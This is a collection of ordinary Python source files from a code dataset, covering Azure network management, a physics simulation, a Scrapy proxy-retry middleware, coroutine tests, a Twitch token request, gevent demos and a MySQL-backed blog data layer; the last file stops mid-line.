+{"seq_id":"387122678","text":"# -*- coding: utf-8 -*-\n'''\nAzure Resource Manager (ARM) Network Public IP Address Execution Module\n\n.. versionadded:: 1.0.0\n\n:maintainer: \n:maturity: new\n:depends:\n    * `azure `_ >= 4.0.0\n    * `azure-common `_ >= 1.1.23\n    * `azure-mgmt `_ >= 4.0.0\n    * `azure-mgmt-compute `_ >= 4.6.2\n    * `azure-mgmt-network `_ >= 4.0.0\n    * `azure-mgmt-resource `_ >= 2.2.0\n    * `azure-mgmt-storage `_ >= 2.0.0\n    * `azure-mgmt-web `_ >= 0.35.0\n    * `azure-storage `_ >= 0.36.0\n    * `msrestazure `_ >= 0.6.1\n:platform: linux\n\n:configuration: This module requires Azure Resource Manager credentials to be passed as keyword arguments\n    to every function in order to work properly.\n\n    Required provider parameters:\n\n    if using username and password:\n      * ``subscription_id``\n      * ``username``\n      * ``password``\n\n    if using a service principal:\n      * ``subscription_id``\n      * ``tenant``\n      * ``client_id``\n      * ``secret``\n\n    Optional provider parameters:\n\n**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud.\n    Possible values:\n      * ``AZURE_PUBLIC_CLOUD`` (default)\n      * ``AZURE_CHINA_CLOUD``\n      * ``AZURE_US_GOV_CLOUD``\n      * ``AZURE_GERMAN_CLOUD``\n\n'''\n\n# Python libs\nfrom __future__ import absolute_import\nimport logging\n\ntry:\n    from six.moves import range as six_range\nexcept ImportError:\n    six_range = range\n\n# Azure libs\nHAS_LIBS = False\ntry:\n    import azure.mgmt.network.models  # pylint: disable=unused-import\n    from msrestazure.tools import is_valid_resource_id, parse_resource_id\n    from msrest.exceptions import SerializationError\n    from msrestazure.azure_exceptions import CloudError\n    HAS_LIBS = True\nexcept ImportError:\n    pass\n\nlog = logging.getLogger(__name__)\n\n\nasync def delete(hub, name, resource_group, **kwargs):\n    '''\n    .. versionadded:: 1.0.0\n\n    Delete a public IP address.\n\n    :param name: The name of the public IP address to delete.\n\n    :param resource_group: The resource group name assigned to the\n        public IP address.\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        azurerm.network.public_ip_address.delete test-pub-ip testgroup\n\n    '''\n    result = False\n    netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n    try:\n        pub_ip = netconn.public_ip_addresses.delete(\n            public_ip_address_name=name,\n            resource_group_name=resource_group\n        )\n        pub_ip.wait()\n        result = True\n    except CloudError as exc:\n        await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n\n    return result\n\n\nasync def get(hub, name, resource_group, **kwargs):\n    '''\n    .. versionadded:: 1.0.0\n\n    Get details about a specific public IP address.\n\n    :param name: The name of the public IP address to query.\n\n    :param resource_group: The resource group name assigned to the\n        public IP address.\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        azurerm.network.public_ip_address.get test-pub-ip testgroup\n\n    '''\n    expand = kwargs.get('expand')\n\n    netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n\n    try:\n        pub_ip = netconn.public_ip_addresses.get(\n            public_ip_address_name=name,\n            resource_group_name=resource_group,\n            expand=expand\n        )\n        result = pub_ip.as_dict()\n    except CloudError as exc:\n        await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n        result = {'error': str(exc)}\n\n    return result\n\n\nasync def create_or_update(hub, name, resource_group, **kwargs):\n    '''\n    .. versionadded:: 1.0.0\n\n    Create or update a public IP address within a specified resource group.\n\n    :param name: The name of the public IP address to create.\n\n    :param resource_group: The resource group name assigned to the\n        public IP address.\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        azurerm.network.public_ip_address.create_or_update test-ip-0 testgroup\n\n    '''\n    if 'location' not in kwargs:\n        rg_props = await hub.exec.azurerm.resource.group.get(\n            resource_group, **kwargs\n        )\n\n        if 'error' in rg_props:\n            log.error(\n                'Unable to determine location from resource group specified.'\n            )\n            return False\n        kwargs['location'] = rg_props['location']\n\n    netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n\n    try:\n        pub_ip_model = await hub.exec.utils.azurerm.create_object_model('network', 'PublicIPAddress', **kwargs)\n    except TypeError as exc:\n        result = {'error': 'The object model could not be built. ({0})'.format(str(exc))}\n        return result\n\n    try:\n        ip = netconn.public_ip_addresses.create_or_update(\n            resource_group_name=resource_group,\n            public_ip_address_name=name,\n            parameters=pub_ip_model\n        )\n        ip.wait()\n        ip_result = ip.result()\n        result = ip_result.as_dict()\n    except CloudError as exc:\n        await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n        result = {'error': str(exc)}\n    except SerializationError as exc:\n        result = {'error': 'The object model could not be parsed. ({0})'.format(str(exc))}\n\n    return result\n\n\nasync def list_all(hub, **kwargs):\n    '''\n    .. versionadded:: 1.0.0\n\n    List all public IP addresses within a subscription.\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        azurerm.network.public_ip_address.list_all\n\n    '''\n    result = {}\n    netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n    try:\n        pub_ips = await hub.exec.utils.azurerm.paged_object_to_list(netconn.public_ip_addresses.list_all())\n\n        for ip in pub_ips:\n            result[ip['name']] = ip\n    except CloudError as exc:\n        await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n        result = {'error': str(exc)}\n\n    return result\n\n\nasync def list_(hub, resource_group, **kwargs):\n    '''\n    .. versionadded:: 1.0.0\n\n    List all public IP addresses within a resource group.\n\n    :param resource_group: The resource group name to list public IP\n        addresses within.\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        azurerm.network.public_ip_address.list testgroup\n\n    '''\n    result = {}\n    netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n    try:\n        pub_ips = await hub.exec.utils.azurerm.paged_object_to_list(\n            netconn.public_ip_addresses.list(\n                resource_group_name=resource_group\n            )\n        )\n\n        for ip in pub_ips:\n            result[ip['name']] = ip\n    except CloudError as exc:\n        await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n        result = {'error': str(exc)}\n\n    return result\n","sub_path":"idem_provider_azurerm/exec/azurerm/network/public_ip_address.py","file_name":"public_ip_address.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"224754328","text":"import pyalps\nimport matplotlib.pyplot as plt\nimport pyalps.plot\nimport numpy as np\n\n#prepare the input parameters\nparms = []\nfor l in [20,40,60,80,100]:\n    for h in np.linspace(0.0,5.0,51):\n        parms.append(\n            { \n              'LATTICE' : \"chain lattice\", \n              'MODEL' : \"spin\",\n              'local_S' : 0.5,\n              'T' : 0.08,\n              'J' : 1 ,\n              'THERMALIZATION' : 10000,\n              'SWEEPS' : 100000,\n              'L' : l,\n              'h' : h\n            }\n        )\n\n#write the input file and run the simulation\ninput_file = pyalps.writeInputFiles('parmHmag',parms)\nres = pyalps.runApplication('dirloop_sse',input_file,Tmin=5)\n\n#load the magnetization and collect it as function of field h\ndata = pyalps.loadMeasurements(pyalps.getResultFiles(prefix='parmHmag'),'Magnetization Density')\nmagnetization = pyalps.collectXY(data,x='h',y='Magnetization Density')\n\n#make plot\nplt.figure()\npyalps.plot.plot(magnetization)\nplt.xlabel('$h$')\nplt.ylabel('Magnetizacija')\nplt.ylim(0.0,0.6)\nplt.title('Kvantni Hajzenbergov lanac (Quantum Heisenberg chain)')\nplt.savefig(\"magnetization_heisenberg_chain.eps\",dpi=300)\n","sub_path":"Magnetization_curves_of_quantum_spin_models/magnetization_heisenberg_chain.py","file_name":"magnetization_heisenberg_chain.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"184009380","text":"from logging import Logger, getLogger\nfrom typing import Optional, Union\n\nfrom scrapy.downloadermiddlewares.retry import RetryMiddleware\nfrom scrapy.http import Response\nfrom scrapy.http.request import Request\nfrom scrapy.spiders import Spider\nfrom scrapy.utils.python import global_object_name\nfrom scrapy.utils.response import response_status_message\n\nfrom .constants import Base as Constants\nfrom .db import db\nfrom .utils import (\n    build_proxycrawl,\n    build_proxycrawl_js,\n    get_url_from_proxycrawl,\n)\n\nlogger = getLogger(__name__)\n\n\ndef get_retry_request(\n    request: Request,\n    spider: Spider,\n    reason: Union[str, Exception] = \"unspecified\",\n    response: Response = None,\n    max_retry_times: Optional[int] = None,\n    priority_adjust: Optional[int] = None,\n    logger: Logger = logger,\n    stats_base_key: str = \"retry\",\n):\n    \"\"\"\n    Returns a new :class:`~scrapy.Request` object to retry the specified\n    request, or ``None`` if retries of the specified request have been\n    exhausted.\n    For example, in a :class:`~scrapy.Spider` callback, you could use it as\n    follows::\n        def parse(self, response):\n            if not response.text:\n                new_request_or_none = get_retry_request(\n                    response.request,\n                    spider=self,\n                    reason='empty',\n                )\n                return new_request_or_none\n\n    *spider* is the :class:`~scrapy.Spider` instance which is asking for the\n    retry request. 
It is used to access the :ref:`settings `\n and :ref:`stats `, and to provide extra logging context (see\n :func:`logging.debug`).\n\n *reason* is a string or an :class:`Exception` object that indicates the\n reason why the request needs to be retried. It is used to name retry stats.\n\n *max_retry_times* is a number that determines the maximum number of times\n that *request* can be retried. If not specified or ``None``, the number is\n read from the :reqmeta:`max_retry_times` meta key of the request. If the\n :reqmeta:`max_retry_times` meta key is not defined or ``None``, the number\n is read from the :setting:`RETRY_TIMES` setting.\n\n *priority_adjust* is a number that determines how the priority of the new\n request changes in relation to *request*. If not specified, the number is\n read from the :setting:`RETRY_PRIORITY_ADJUST` setting.\n\n *logger* is the logging.Logger object to be used when logging messages\n\n *stats_base_key* is a string to be used as the base key for the\n retry-related job stats\n\n \"\"\"\n settings = spider.crawler.settings\n stats = spider.crawler.stats\n retry_times = request.meta.get(\"retry_times\", 0) + 1\n\n crawlera = request.meta.get(\"crawlera\")\n proxycrawl = request.meta.get(\"proxycrawl\")\n proxycrawl_js = request.meta.get(\"proxycrawl_js\")\n proxycrawl_js_enabled = request.meta.get(\"proxycrawl_js_enabled\", False)\n\n crawlera_error = None\n response_status_code = None\n\n page_name = request.meta.get(\"page_name\", \"unknown_page\")\n\n if response:\n response_status_code = response.status\n crawlera_error = response.headers.get(\"X-Crawlera-Error\")\n crawlera_error = crawlera_error.decode(\"utf-8\") if crawlera_error else None\n\n proxy_provider = \"crawlera\"\n if \"proxycrawl\" in request.url:\n proxy_provider = \"proxycrawl\"\n\n if not (crawlera and proxycrawl and proxycrawl_js):\n raise NoProxyCredentials(\"crawlera, proxycrawl, and proxycrawl_js API Key is required\")\n\n if max_retry_times is None:\n max_retry_times = request.meta.get(\"max_retry_times\", 1)\n if max_retry_times is None:\n max_retry_times = int(settings.getint(\"RETRY_TIMES\"))\n\n if proxy_provider == \"crawlera\":\n key = f\"{Constants.CRAWLERA_ERROR}\"\n stats.inc_value(key)\n if crawlera_error:\n key += f\"/{crawlera_error}\"\n stats.inc_value(key)\n\n key = f\"{Constants.CRAWLERA_ERROR}/{response_status_code}\"\n stats.inc_value(key)\n if crawlera_error:\n key += f\"/{crawlera_error}\"\n stats.inc_value(key)\n\n if response_status_code:\n key = f\"{Constants.CRAWLERA_ERROR}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}\"\n stats.inc_value(key)\n if crawlera_error:\n key += f\"/{crawlera_error}\"\n stats.inc_value(key)\n\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}/{response_status_code}\"\n stats.inc_value(key)\n if crawlera_error:\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}/{crawlera_error}\"\n stats.inc_value(key)\n\n if response_status_code:\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n elif proxy_provider == \"proxycrawl\":\n key = f\"{Constants.PROXYCRAWL_ERROR}\"\n stats.inc_value(key)\n\n key = f\"{Constants.PROXYCRAWL_ERROR}/{response_status_code}\"\n stats.inc_value(key)\n\n if response_status_code:\n key = f\"{Constants.PROXYCRAWL_ERROR}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n key = f\"{Constants.PROXYCRAWL_ERROR}/{page_name}/{response_status_code}\"\n stats.inc_value(key)\n\n if 
response_status_code:\n key = f\"{Constants.PROXYCRAWL_ERROR}/{page_name}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n if retry_times <= max_retry_times:\n new_request = request.copy()\n new_request.meta[\"retry_times\"] = retry_times\n new_request.dont_filter = True\n if priority_adjust is None:\n priority_adjust = settings.getint(\"RETRY_PRIORITY_ADJUST\")\n new_request.priority = request.priority + priority_adjust # type: ignore\n\n if callable(reason):\n reason = reason()\n if isinstance(reason, Exception):\n reason = global_object_name(reason.__class__)\n\n stats.inc_value(f\"{stats_base_key}/count\")\n stats.inc_value(f\"{stats_base_key}/reason_count/{reason}\")\n\n if retry_times == 1:\n if proxy_provider == \"crawlera\":\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - \"\n f\"using {proxy_provider}(X-Crawlera-Error = {crawlera_error}): {reason}\",\n extra={\"spider\": spider},\n )\n else:\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - using {proxy_provider}: {reason}\",\n extra={\"spider\": spider},\n )\n else:\n # Switch proxy provider\n if \"proxycrawl\" in request.url:\n new_request.meta[\"proxy\"] = crawlera\n new_url = get_url_from_proxycrawl(request.url)\n new_request = new_request.replace(url=new_url)\n\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - switch proxycrawl to crawlera: {reason}\",\n extra={\"spider\": spider},\n )\n else:\n new_request.meta[\"proxy\"] = None\n\n if proxycrawl_js_enabled:\n new_url = build_proxycrawl_js(request.url, proxycrawl_js)\n new_request = new_request.replace(url=new_url)\n else:\n new_url = build_proxycrawl(request.url, proxycrawl)\n new_request = new_request.replace(url=new_url)\n\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - \"\n f\"using {proxy_provider}(X-Crawlera-Error = {crawlera_error}): {reason}\",\n extra={\"spider\": spider},\n )\n\n return new_request\n else:\n update_on_fail = request.meta.get(\"update_on_fail\")\n if update_on_fail:\n key_name = update_on_fail[\"key\"]\n key_value = update_on_fail[key_name]\n update_values = update_on_fail[\"update_values\"]\n\n collection = db[update_on_fail[\"collection\"]]\n collection.update_one({key_name: key_value}, {\"$set\": update_values})\n\n stats.inc_value(f\"{stats_base_key}/max_reached\")\n\n if proxy_provider == \"crawlera\":\n logger.debug(\n f\"Gave up retrying {request} (failed {retry_times} times) - \"\n f\"using {proxy_provider}(X-Crawlera-Error = {crawlera_error}): {reason}\",\n extra={\"spider\": spider},\n )\n else:\n logger.debug(\n f\"Gave up retrying {request} (failed {retry_times} times) - using {proxy_provider}: {reason}\",\n extra={\"spider\": spider},\n )\n\n return None\n\n\nclass CustomRetryMiddleware(RetryMiddleware):\n def process_response(self, request, response, spider):\n if request.meta.get(\"dont_retry\", False):\n return response\n if response.status in self.retry_http_codes:\n reason = response_status_message(response.status)\n return self._retry(request, reason, spider, response) or response\n return response\n\n def _retry(self, request, reason, spider, response=None):\n max_retry_times = request.meta.get(\"max_retry_times\", self.max_retry_times)\n priority_adjust = request.meta.get(\"priority_adjust\", self.priority_adjust)\n return get_retry_request(\n request=request,\n spider=spider,\n reason=reason,\n response=response,\n max_retry_times=max_retry_times,\n priority_adjust=priority_adjust,\n )\n\n\nclass NoProxyCredentials(Exception):\n 
pass\n","sub_path":"scrapy_project/build/lib/project/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"3277761","text":"lol = [[0]*3]*3\nprint(lol)\nfir, sec, thr = lol\nfir[0] = 1\nsec[1] = 2\nthr[2] = 3\nprint(lol)\n\n\n# old_print = print\n# print_fd = open(...)\n# def print(*args, *kwargs):\n# if 'file' in kwargs: return old_print(*args, **kwargs)\n# else: return old_print(*args, file=print_fd, **kwargs)\n#\n# Направит все принты в указанный файл, если параметр file не указан.\n# Иными словами это весь вывод скрипта направит в файл","sub_path":"lesson_05/lol.py","file_name":"lol.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"244856129","text":"import unittest\nfrom . import tools\nfrom .decorators import invertibleGenerator, coroutine\nfrom nose.tools import assert_equal\nfrom nose_parameterized import parameterized\n\n\n@invertibleGenerator\ndef genAfterLoop(iterable):\n\n for val in iterable:\n yield val\n\n yield 42\n\n\n@invertibleGenerator\ndef genBeforeLoop(iterable):\n\n yield 42\n\n for val in iterable:\n yield val\n\n\n@invertibleGenerator\ndef genTwoLoops(iterable):\n\n for val in iterable:\n if val == \"break\":\n yield \"break from first\"\n break\n yield \"first: \" + str(val)\n\n yield \"between loops\"\n\n for val in iterable:\n if val == \"break\":\n yield \"break from second\"\n break\n yield \"second \" + str(val)\n\n yield \"done\"\n\n\n@coroutine\ndef coTwoLoops(target):\n notDone = True\n\n try:\n while notDone:\n val = (yield)\n if val == \"break\":\n target.send(\"break from first\")\n break\n target.send(\"first: \" + str(val))\n except GeneratorExit:\n notDone = False\n\n target.send(\"between loops\")\n\n try:\n while notDone:\n val = (yield)\n if val == \"break\":\n target.send(\"break from second\")\n break\n target.send(\"second \" + str(val))\n except GeneratorExit:\n notDone = False\n\n target.send(\"done\")\n\n\nclass DummyCoroutine(object):\n \"\"\" A dummy \"sink\" coroutine that records all values sent to it. 
\"\"\"\n\n def __init__(self):\n self.results = []\n self.closed = False\n self.resultsAfterClose = []\n\n def send(self, val):\n if self.closed:\n self.resultsAfterClose.append(val)\n else:\n self.results.append(val)\n\n def close(self):\n self.closed = True\n\n\ndef runCoroutinePipeline(pipeline, iterable):\n\n dummy = DummyCoroutine()\n tools.pushFromIterable(iterable, pipeline(dummy))\n\n return dummy.results\n\n\ndef runGeneratorPipeline(pipeline, iterable):\n results = [val for val in pipeline(iterable)]\n return results\n\n\ndef assertEqualPipelines(genPipeline, coPipeline, iterable):\n\n cachedIterable = list(iterable)\n assert_equal(runGeneratorPipeline(genPipeline, cachedIterable.__iter__()),\n runCoroutinePipeline(coPipeline, cachedIterable))\n\n\nclass TestEquivalence(unittest.TestCase):\n\n testParameters = [\n (\"empty\", []),\n (\"one\", [1]),\n (\"odd list\", [1, 2, 3, 4, 5]),\n (\"even list\", [1, 2, 3, 4, 5, 6]),\n ]\n\n @parameterized.expand(testParameters)\n def test_passthrough(self, _, l):\n assertEqualPipelines(\n tools.genPassthrough, tools.genPassthrough.co, l)\n\n @parameterized.expand(testParameters)\n def test_pair(self, _, l):\n assertEqualPipelines(\n tools.genPairs,\n tools.genPairs.co, l)\n\n @parameterized.expand(testParameters)\n def test_filter(self, _, l):\n iseven = lambda x: x % 2 == 0\n\n assertEqualPipelines(\n lambda i: tools.genFilter(iseven, i),\n lambda i: tools.genFilter.co(iseven, i),\n l)\n\n @parameterized.expand(testParameters)\n def test_after_loop(self, _, l):\n assertEqualPipelines(\n genAfterLoop,\n genAfterLoop.co, l)\n\n @parameterized.expand(testParameters)\n def test_before_loop(self, _, l):\n assertEqualPipelines(\n genBeforeLoop,\n genBeforeLoop.co, l)\n\n @parameterized.expand(\n testParameters + [\n (\"one break\", [\"break\"]),\n (\"val + one break\", [1, \"break\"]),\n (\"vals + one break\", [1, 2, \"break\"]),\n (\"one break + val\", [\"break\", 1]),\n (\"one break + vals\", [\"break\", 1, 2]),\n (\"two breaks\", [\"break\", \"break\"]),\n (\"vals + two breaks\", [1, 2, \"break\", \"break\"]),\n (\"two breaks + vals\", [\"break\", \"break\", 1, 2]),\n (\"break + vals + break\", [\"break\", 1, 2, \"break\"]),\n (\"vals + two break + vals\", [1, 2, \"break\", 3, 4, \"break\", 5, 6]),\n ])\n def test_two_loops(self, _, l):\n assertEqualPipelines(\n genTwoLoops,\n genTwoLoops.co, l)\n","sub_path":"generators_to_coroutines/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"467597970","text":"from urllib import request, parse\nimport requests\nfrom oauthlib.oauth2 import BackendApplicationClient\nimport requests_oauthlib\nimport json\n\nurl = 'https://id.twitch.tv/oauth2/token'\nclient_credentials = json.loads(open('twitch_secret.json').read())\n#\n#\n# client = BackendApplicationClient(client_credentials['secret']['id'])\n# oauth_object = requests_oauthlib.OAuth2Session(client=client)\n# token = oauth_object.fetch_token(token_url=url,\n# client_id=client_credentials['secret']['id'],\n# client_secret=client_credentials['secret']['secret'])\n# access_token = token['access_token']\n\n# my_request = requests.get(url, params={\n# 'client_id': client_credentials['secret']['id'],\n# 'redirect_uri': 'http://localhost',\n# 'client_secret': client_credentials['secret']['secret'],\n# 'grant_type': 'client_credentials'\n# # 'response_type': 'code'\n# })\n\nmy_response = requests.post(url, data={\n 'client_id': 
client_credentials['secret']['id'],\n 'redirect_uri': 'http://localhost',\n 'client_secret': client_credentials['secret']['secret'],\n 'grant_type': 'client_credentials'\n }\n)\n\nprint(my_response.text)\n\ncredentials_response = json.loads(my_response.text)\n\nwith open('acquired_token.txt', 'w') as in_file:\n in_file.write(credentials_response['access_token'])","sub_path":"get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"67558604","text":"#!/usr/bin/python\n# -*-coding: utf-8 -*-\n\nimport math\n\n\ndef primelocation(n):\n if n < 2:\n return 2\n count = 1\n j = 3\n while True:\n if isprime(j):\n count += 1\n if count == n:\n return j\n j += 2\n\n\ndef isprime(number):\n for i in range(2, int(math.sqrt(number))+1):\n if number % i == 0:\n return False\n return True\n\n\nprimelocation(10001)\n","sub_path":"Project-Euler/src/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"467760727","text":"import gevent\nimport gevent.monkey\nimport time\nimport datetime\ngevent.monkey.patch_all()\n\n\ndef _thread_one():\n while True:\n print(1)\n start = time.time()\n gevent.sleep(3)\n # print(\"{} {}\".format('one', time.time() - start))\n print(\"{} {}\".format('one', datetime.datetime.now()))\n\n\ndef _thread_two():\n while True:\n print(2)\n start = time.time()\n gevent.sleep(4)\n # print(\"{} {}\".format('two', time.time() - start))\n print(\"{} {}\".format('two', datetime.datetime.now()))\n\n\ndef _thread_three():\n while True:\n print(3)\n start = time.time()\n gevent.sleep(5)\n # print(\"{} {}\".format('three', time.time() - start))\n print(\"{} {}\".format('three', datetime.datetime.now()))\n\n\ndef main():\n # three coroutines\n thread_list = [_thread_one, _thread_two, _thread_three]\n spawns = []\n for t in thread_list:\n spawns += [gevent.spawn(t)]\n\n gevent.joinall(spawns)\n\n\ndef all_in_one():\n # a single coroutine\n while True:\n _thread_one()\n _thread_two()\n _thread_three()\n gevent.sleep(3)\n\n\ndef main_all_in_one():\n gevent.joinall([gevent.spawn(all_in_one)])\n\n\nif __name__ == '__main__':\n main()\n# main_all_in_one()\n","sub_path":"Gevent/gevent_threads.py","file_name":"gevent_threads.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"441973999","text":"import pymysql\nimport sys\n\nINSERTUSER = 'INSERT INTO user(_name, _password,_github,_wechat,_info,_create,_access) VALUES(%s, %s, %s, %s, %s, %s, %s)'\nUPDATEUSER='UPDATE user SET _password=%s,_github=%s,_wechat=%s,_info=%s WHERE _id=%s'\nSEARCHUSER = \"SELECT * FROM user WHERE _name=%s\"\nDELETEUSER='DELETE FROM user WHERE _id=%s'\nSEARCHUSERBYID='SELECT * FROM user WHERE _id=%s'\nSEARCHALLUSER='SELECT * FROM user'\n\nINSERTARTICLE='INSERT INTO articles(_img,_subtitle,_author,_create,_update,_title,_content,_class,_counts) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)'\nSEARCHCLASSARTICLES='SELECT * FROM articles WHERE _class = %s '\nSEARCHONEARTICLE='SELECT * FROM articles WHERE _id=%s '\nUPDATEARTICLE='UPDATE articles SET _img=%s,_subtitle=%s, _author=%s,_update=%s,_title=%s, _content=%s, _class=%s WHERE _id=%s'\nCOUNTARTICLE='UPDATE articles SET _counts=_counts+1 WHERE _id=%s'\nDELETEARTICLE='DELETE FROM articles WHERE _id=%s'\nSEARCHALLARTICLE='SELECT * FROM articles'\n\nINSERTCOMMENT='INSERT INTO 
comment(_name,_content,_create,_fatherid,_sonid,_for) VALUES(%s,%s,%s,%s,%s,%s)'\nSEARCHSONCOMMENT='SELECT * FROM comment WHERE _fatherid=%s'\nSEARCHONECOMMENT='SELECT * FROM comment WHERE _sonid=%s'\nDELETECOMMENT='DELETE FROM comment WHERE _id=%s'\nCOUNTCOMMENT='UPDATE comment SET _for=_for+1 WHERE _id=%s'\nSEARCHALLCOMMENT='SELECT * FROM comment'\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\ndef init_mysql():\n conn = pymysql.connect(host = \"127.0.0.1\", port = 3306, user = \"root\", password = \"yuliang\", db = \"blog2017\", charset = \"utf8\")\n return conn\n\nclass user():\n \"\"\"docstring for .\"\"\"\n def create(self,**data):\n print(data)\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHUSER,data['name'])\n sta = cursor.fetchone()\n print(sta)\n print('status:'+str(sta=='None'))\n if str(sta)=='None':\n sta=cursor.execute(INSERTUSER,(data['name'],data['password'],data['github'],data['wechat'],data['info'],data['create'],0))\n print(sta)\n conn.commit()\n conn.close()\n return {'status':'success','code':sta}\n else:\n print(sta)\n conn.commit()\n conn.close()\n return {'status':'error','info':'invalid username'}\n\n\n def delete(self,id):\n conn = init_mysql()\n cursor = conn.cursor()\n sta = cursor.execute(DELETEUSER,(int(id)))\n conn.commit()\n conn.close()\n return sta;\n\n def login(self,name,password):\n conn = init_mysql()\n cursor = conn.cursor()\n print('>>> n3 = %s' % name)\n print('>>> n4 = %s' % password)\n cursor.execute(SEARCHUSER,name)\n data = cursor.fetchone()\n if str(data)=='None':\n conn.commit()\n conn.close()\n return {'status':404}\n else :\n if data[2] == password:\n conn.commit()\n conn.close()\n return {'status':200,'id':data[0],'access':data[6]}\n else :\n conn.commit()\n conn.close()\n return {'status':202}\n\n def update(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta = cursor.execute(UPDATEUSER,\n (data['password'],data['github'],data['wechat'],data['info'],data['id']))\n conn.commit()\n conn.close()\n return sta\n\n def getinfo(self,name):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHUSER,(name))\n data=cursor.fetchone()\n conn.commit()\n conn.close()\n return data\n\n def getaccess(self,name):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHUSERBYID,name)\n data=cursor.fetchone()\n conn.commit()\n conn.close()\n return data[7]\n\n def serach_all(self):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHALLUSER,())\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n\nclass articles():\n \"\"\"docstring for .\"\"\"\n def create(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(INSERTARTICLE,\n (data['img'],data['subtitle'],data['author'],data['create'],data['update'],data['title'],data['content'],data['class'],data['counts']))\n conn.commit()\n conn.close()\n return sta\n\n def count(self,id):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(COUNTARTICLE,(id))\n conn.commit()\n conn.close()\n return sta\n\n def delete(self,id):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(DELETEARTICLE,(id))\n conn.commit()\n conn.close()\n return sta\n\n def search_one(self,id):\n #:get one article\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHONEARTICLE,(id))\n data=cursor.fetchone()\n conn.commit()\n conn.close()\n return data\n\n def serach_muti(self,data):\n conn = init_mysql()\n cursor = conn.cursor()\n 
cursor.execute(SEARCHCLASSARTICLES,(data))\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n\n def serach_all(self):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHALLARTICLE,())\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n\n def update(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(UPDATEARTICLE,(data['img'],data['subtitle'],data['author'],data['update'],data['title'],data['content'],data['class'],data['id']))\n conn.commit()\n conn.close()\n return sta\n\nclass comment():\n \"\"\"docstring for .\"\"\"\n def create(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(INSERTCOMMENT,(data['name'],data['content'],data['create'],data['fatherid'],data['sonid'],data['for']))\n conn.commit()\n conn.close()\n return sta\n\n def search_son(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n cursor.execute(SEARCHSONCOMMENT,(id))\n data = cursor.fetchall()\n conn.commit()\n conn.close()\n return data\n\n def search_article(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n cursor.execute(SEARCHONECOMMENT,(id))\n data = cursor.fetchall()\n conn.commit()\n conn.close()\n return data\n\n def delete(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n status=cursor.execute(DELETECOMMENT,(id))\n conn.commit()\n conn.close()\n return status\n\n def count(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n status=cursor.execute(COUNTCOMMENT,(id))\n conn.commit()\n conn.close()\n return status\n\n def serach_all(self):\n conn = init_mysql()\n cursor = 